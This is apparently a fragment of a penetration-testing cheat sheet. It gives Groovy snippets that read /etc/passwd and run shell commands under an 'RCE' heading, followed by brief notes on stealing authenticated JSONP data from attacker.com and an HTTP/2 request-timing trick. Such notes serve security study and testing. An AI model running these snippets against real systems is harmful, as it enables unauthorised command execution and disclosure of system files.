new File("/etc/passwd").withReader('UTF-8') { reader ->
2
def line
3
while ((line = reader.readLine()) != null) {
4
println "${line}"
5
}
6
}
Copied!
RCE
1
def process = "ls -lah".execute()
2
println "${process.text}"
Copied!
1
def sout = new StringBuffer(), serr = new StringBuffer()
2
def proc = 'ls -lah'.execute()
3
proc.consumeProcessOutput(sout, serr)
4
proc.waitForOrKill(1000)
5
println "$sout"
Copied!
JsonP
Only useful if a jsonp endpoints requires authentication. A Victim at attacker.com will retrieve the data from victim.com and send its cookie along because of how jsonp works (Reference: https://www.sjoerdlangkemper.nl/2019/01/02/jsonp/).
The idea is to use HTTP2 to send multiple requests in one which allows us to measure the difference, by looking at which comes back first. Repeat this a lot to get some statistical relevance.